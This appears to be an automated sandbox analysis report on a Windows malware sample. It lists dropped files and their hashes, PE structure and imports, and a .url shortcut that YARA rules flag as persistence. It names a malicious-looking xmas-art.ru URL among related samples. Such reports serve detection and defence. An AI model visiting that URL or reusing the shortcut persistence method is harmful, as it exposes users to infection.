                                                                                              • 13.107.43.12
                                                                                              xk4hYcb56p.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              library.dllGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Setup.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2Get hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Policy handbook.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.43.12

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\Public\Libraries\Mwqrxeuz

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):167894
                                                                                              Entropy (8bit):7.836989185036909
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:oX7iyI1g1T9ZeIssvAq21B+OXSuWQ/e9WMEnOuljlyTe9iotErmwT46lcHNo9igQ:oX2yA8T9ZeIPoHBSDGDM9u4K9ioQESTQ
                                                                                              MD5:A4230DEF1381688D96A42C48723B6FB4
                                                                                              SHA1:DAC39DC194EB7525BE189B5BE47E7B3A70E8DF0B
                                                                                              SHA-256:C3F4FA12B0F5A069BD9CEF7EE09AEEE8DADB2199A3A0F05009E068C0CC0CB3F8
                                                                                              SHA-512:E6EA4CB1E3693DD84145D6475EA2EBB2D01C4D1BA980CE42924DC83D396669CC423C6E5589E050CA33FD1B1EF7B21AAF2DC7B4674294917684557D5C716CFB13
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:....4.e.4..kk.4........kk.4.......4qwym.....qw.}.m.m..{.}...o.u......mw..m..mw............w...u.......w{ws..wm{m..{uo.}m.q.q....s....4.e.4..kk.4........kk.4.......4..}..q...uy....4.e.4..kk.4........kk.4.......4....JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^......\.=....b.S.A...%.\.4O~.N.....!...e.P..zF.^..#...Uq...(..........:...8x.2...f.r.7Em X....b.F.g$....ab..X...n:.IG|...W.{s.z.

                                                                                              C:\Users\Public\Libraries\Mwqrxeuz.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):750592
                                                                                              Entropy (8bit):6.881084216281991
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri4Z2qKk/RqIkr:WFhHzmQgn6+8T/r7saqI
                                                                                              MD5:EDB1382C354EC6C09C53473E5335703A
                                                                                              SHA1:A1A5FBFCE034731CBA1072BAB6B97B26C8A90C79
                                                                                              SHA-256:C2C6EEC67A1561C3A49179DDF756480876D92588C2E83D64246A04C3D724CB3D
                                                                                              SHA-512:7A39E02E0C6B5036763A7646A5960DE36230EAEF32DA6B36687AA71170BD2125775888EC71FF112FB76A38D17D77B650089257043288FAE82598DEE5E6987ED9
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 36%
                                                                                              Reputation:low
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................b.......&.......0....@..............................................@........................... ...%.......$...................p...n...........................`......................$'...............................text...,........................... ..`.itext..$.... ...................... ..`.data........0......................@....bss....`6...............................idata...%... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...n...p...p..................@..B.rsrc....$.......$...N..............@..@.....................r..............@..@................................................................................................

                                                                                              C:\Users\Public\Libraries\Mwqrxeuz.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              C:\Users\Public\Libraries\zuexrqwM.url

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Mwqrxeuz.exe">), ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):100
                                                                                              Entropy (8bit):5.027627100346909
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMiCK0dAIvsGKd7DKCov:HRYFVmTWDyzM7vsb7uCy
                                                                                              MD5:7DDCB7FA3CEA8198D5ADEBF8F7797F74
                                                                                              SHA1:4552A0DFE75A7CF4875DDB3575800AE137F88E04
                                                                                              SHA-256:7E678198AFD5C53ADDBD2133245E72EBF9D6885F20496F5ACAEF2CF56C54856D
                                                                                              SHA-512:D985A2CEF6438CAA20E784A43CF752BCB1AF2608633C050DF55A194766D1C1BC3D106D7786D63E316DEF0E011E98D263C99510D7E843E8A6709F4DDFD1BA67F3
                                                                                              Malicious:false
                                                                                              Yara Hits:
                                                                                              • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\zuexrqwM.url, Author: @itsreallynick (Nick Carr)
                                                                                              • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\zuexrqwM.url, Author: @itsreallynick (Nick Carr)
                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Mwqrxeuz.exe"..IconIndex=31..HotKey=29..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\Mwqrxeuzvim[1]

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\0321423605241625.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):167894
                                                                                              Entropy (8bit):7.836989185036909
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:oX7iyI1g1T9ZeIssvAq21B+OXSuWQ/e9WMEnOuljlyTe9iotErmwT46lcHNo9igQ:oX2yA8T9ZeIPoHBSDGDM9u4K9ioQESTQ
                                                                                              MD5:A4230DEF1381688D96A42C48723B6FB4
                                                                                              SHA1:DAC39DC194EB7525BE189B5BE47E7B3A70E8DF0B
                                                                                              SHA-256:C3F4FA12B0F5A069BD9CEF7EE09AEEE8DADB2199A3A0F05009E068C0CC0CB3F8
                                                                                              SHA-512:E6EA4CB1E3693DD84145D6475EA2EBB2D01C4D1BA980CE42924DC83D396669CC423C6E5589E050CA33FD1B1EF7B21AAF2DC7B4674294917684557D5C716CFB13
                                                                                              Malicious:false
                                                                                              Preview:....4.e.4..kk.4........kk.4.......4qwym.....qw.}.m.m..{.}...o.u......mw..m..mw............w...u.......w{ws..wm{m..{uo.}m.q.q....s....4.e.4..kk.4........kk.4.......4..}..q...uy....4.e.4..kk.4........kk.4.......4....JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^.......JddF^........J\....`T.b.NP^L....T..ZJ..FP\.\`FF\TJL.F.\..\dPL.b.....Z...FF...J..\.\..^......\.=....b.S.A...%.\.4O~.N.....!...e.P..zF.^..#...Uq...(..........:...8x.2...f.r.7Em X....b.F.g$....ab..X...n:.IG|...W.{s.z.

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):6.881084216281991
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.38%
                                                                                              • InstallShield setup (43055/19) 0.43%
                                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              File name:0321423605241625.exe
                                                                                              File size:750592
                                                                                              MD5:edb1382c354ec6c09c53473e5335703a
                                                                                              SHA1:a1a5fbfce034731cba1072bab6b97b26c8a90c79
                                                                                              SHA256:c2c6eec67a1561c3a49179ddf756480876d92588c2e83d64246a04c3d724cb3d
                                                                                              SHA512:7a39e02e0c6b5036763a7646a5960de36230eaef32da6b36687aa71170bd2125775888ec71ff112fb76a38d17d77b650089257043288fae82598dee5e6987ed9
                                                                                              SSDEEP:12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri4Z2qKk/RqIkr:WFhHzmQgn6+8T/r7saqI
                                                                                              TLSH:D4F47D6662D08637D02715389C07A7A8692FAEE02F14F8956BD53DCC5F383CE743926B
                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                              File Icon

                                                                                              Icon Hash:2321270727090923

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x4626e8
                                                                                              Entrypoint Section:.itext
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                              DLL Characteristics:
                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:5a047051636dce23e36a7dceaf1507c0

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              add esp, FFFFFFF0h
                                                                                              mov eax, 0046105Ch
                                                                                              call 00007FDD10D0EC15h
                                                                                              mov ecx, dword ptr [0046D410h]
                                                                                              mov eax, dword ptr [0046D324h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, dword ptr [00460A90h]
                                                                                              call 00007FDD10D615EDh
                                                                                              mov eax, dword ptr [0046D324h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007FDD10D61661h
                                                                                              call 00007FDD10D0CD18h
                                                                                              lea eax, dword ptr [eax+00h]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x720000x25ac.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x42400.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x770000x6eec.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x760000x18.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x727240x5e4.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x6022c0x60400False0.5191025771103897data6.531038724700122IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .itext0x620000x7240x800False0.57373046875data5.847823102407548IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .data0x630000xa49c0xa600False0.08553746234939759data6.533389727605739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .bss0x6e0000x36600x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .idata0x720000x25ac0x2600False0.32452713815789475data5.139331879404015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .tls0x750000x340x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rdata0x760000x180x200False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x770000x6eec0x7000False0.6196986607142857data6.6810323966616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x7e0000x424000x42400False0.4435620577830189data6.403601787519998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountry
                                                                                              RT_CURSOR0x7ef0c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States
                                                                                              RT_CURSOR0x7f0400x134dataEnglishUnited States
                                                                                              RT_CURSOR0x7f1740x134dataEnglishUnited States
                                                                                              RT_CURSOR0x7f2a80x134dataEnglishUnited States
                                                                                              RT_CURSOR0x7f3dc0x134dataEnglishUnited States
                                                                                              RT_CURSOR0x7f5100x134dataEnglishUnited States
                                                                                              RT_CURSOR0x7f6440x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States
                                                                                              RT_BITMAP0x7f7780x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x7f8a00x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x7f9c80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x7faf00xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States
                                                                                              RT_BITMAP0x7fbd80x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x7fd000x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x7fe280xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States
                                                                                              RT_BITMAP0x7fef80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x800200x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x801480x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x802700x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x803980x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x804c00xe8Device independent bitmap graphic, 12 x 16 x 4, image size 128EnglishUnited States
                                                                                              RT_BITMAP0x805a80x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x806d00x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x807f80xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States
                                                                                              RT_BITMAP0x808c80x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x809f00x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x80b180x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x80c400x128Device independent bitmap graphic, 19 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x80d680x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x80e900xe8Device independent bitmap graphic, 13 x 16 x 4, image size 128EnglishUnited States
                                                                                              RT_BITMAP0x80f780x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x810a00x128Device independent bitmap graphic, 20 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x811c80xd0Device independent bitmap graphic, 13 x 13 x 4, image size 104EnglishUnited States
                                                                                              RT_BITMAP0x812980x128Device independent bitmap graphic, 21 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_BITMAP0x813c00x128Device independent bitmap graphic, 17 x 16 x 4, image size 192EnglishUnited States
                                                                                              RT_ICON0x814e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                                                                                              RT_ICON0x825900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216
                                                                                              RT_ICON0x84b380x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736
                                                                                              RT_ICON0x89fc00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864
                                                                                              RT_STRING0x934680x200data
                                                                                              RT_STRING0x936680x188data
                                                                                              RT_STRING0x937f00xc8data
                                                                                              RT_STRING0x938b80x350data
                                                                                              RT_STRING0x93c080x3d8data
                                                                                              RT_STRING0x93fe00x388data
                                                                                              RT_STRING0x943680x418data
                                                                                              RT_STRING0x947800x140data
                                                                                              RT_STRING0x948c00xccdata
                                                                                              RT_STRING0x9498c0x1ecdata
                                                                                              RT_STRING0x94b780x3b0data
                                                                                              RT_STRING0x94f280x354data
                                                                                              RT_STRING0x9527c0x2a4data
                                                                                              RT_RCDATA0x955200x10data
                                                                                              RT_RCDATA0x955300x2a7c2GIF image data, version 89a, 300 x 168EnglishUnited States
                                                                                              RT_RCDATA0xbfcf40x254data
                                                                                              RT_RCDATA0xbff480x3e0Delphi compiled form 'TForm1'
                                                                                              RT_GROUP_CURSOR0xc03280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                              RT_GROUP_CURSOR0xc033c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                              RT_GROUP_CURSOR0xc03500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                              RT_GROUP_CURSOR0xc03640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                              RT_GROUP_CURSOR0xc03780x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                              RT_GROUP_CURSOR0xc038c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                              RT_GROUP_CURSOR0xc03a00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                              RT_GROUP_ICON0xc03b40x3edata

                                                                                              Imports

                                                                                              DLLImport
                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                              user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                              kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                              user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                              kernel32.dlllstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
